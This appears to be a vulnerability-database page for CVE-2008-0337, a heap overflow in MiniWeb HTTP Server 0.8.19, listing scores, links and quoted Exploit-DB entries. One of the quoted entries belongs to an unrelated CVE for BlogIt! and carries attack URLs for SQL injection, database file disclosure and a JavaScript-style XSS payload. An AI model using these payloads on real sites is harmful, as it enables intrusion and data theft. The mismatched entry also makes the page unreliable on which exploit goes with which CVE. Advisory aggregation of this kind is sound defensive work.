CVE-2008-0337
published 2008-01-17CVE-2008-0337: Heap-based buffer overflow in the _mwProcessReadSocket function in http.c in MiniWeb HTTP Server 0.8.19 allows remote attackers to execute arbitrary code via a…
PriorityP347high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
5.36%
91.6th percentile
Heap-based buffer overflow in the _mwProcessReadSocket function in http.c in MiniWeb HTTP Server 0.8.19 allows remote attackers to execute arbitrary code via a long URI.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| miniweb_http_server | miniweb_http_server | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
blogit! - SQL Injection / File Disclosure / Cross-Site Scripting
exploitdb·2009-01-16
CVE-2009-0337 blogit! - SQL Injection / File Disclosure / Cross-Site Scripting
blogit! - SQL Injection / File Disclosure / Cross-Site Scripting
---
#########################################################
Portal Name: BlogIt!
Download : http://www.katywhitton.com/downloads/BlogIt!/BlogItDL.zip
Author : Pouya_Server , [email protected]
Vulnerability : (SQL/DD/XSS)
#########################################################
[SQL]:
http://site.com/[Path]/index.asp?view=archive&day=[SQL]
[DD]:
http://site.com/[Path]/database/Blog.mdb
[XSS]:
http://site.com/[Path]/index.asp?view='+style='background:url(JaVaScRiPt:alert(1369))'+invalidparam='&day=1&month=12&year=2008
# milw0rm.com [2009-01-16]
Exploit-DB
Miniweb 0.8.19 - Multiple Vulnerabilities
exploitdb·2008-01-16
CVE-2008-0338 Miniweb 0.8.19 - Multiple Vulnerabilities
Miniweb 0.8.19 - Multiple Vulnerabilities
---
MiniWeb Multiple Vulnerabilities
Introduction
MiniWeb is a mini HTTP server implementation written in C language,
featuring low system resource consumption, high efficiency, good
flexibility and high portability.
It is capable to serve multiple clients with a single thread,
supporting GET and POST methods, authentication, dynamic contents
(dynamic web page and page variable substitution) and file uploading.
MiniWeb runs on POSIX complaint OS, like Linux, as well as Microsoft Windows.
vulnerability discovered by : Hamid Ebadi (ebadi _AT_ bugtraq.ir)
http://www.bugtraq.ir
complete advisory and also source code auditing can be found at :
http://www.bugtraq.ir/adv/miniweb_persian.pdf (persian)
http://www.bugtraq.ir/adv/miniweb_english.pdf (e
No writeups or analysis indexed.
http://secunia.com/advisories/28512http://www.bugtraq.ir/adv/miniweb_english.pdfhttp://www.securityfocus.com/bid/27319http://www.vupen.com/english/advisories/2008/0176https://exchange.xforce.ibmcloud.com/vulnerabilities/39718https://www.exploit-db.com/exploits/4923http://secunia.com/advisories/28512http://www.bugtraq.ir/adv/miniweb_english.pdfhttp://www.securityfocus.com/bid/27319http://www.vupen.com/english/advisories/2008/0176https://exchange.xforce.ibmcloud.com/vulnerabilities/39718https://www.exploit-db.com/exploits/4923
2008-01-17
Published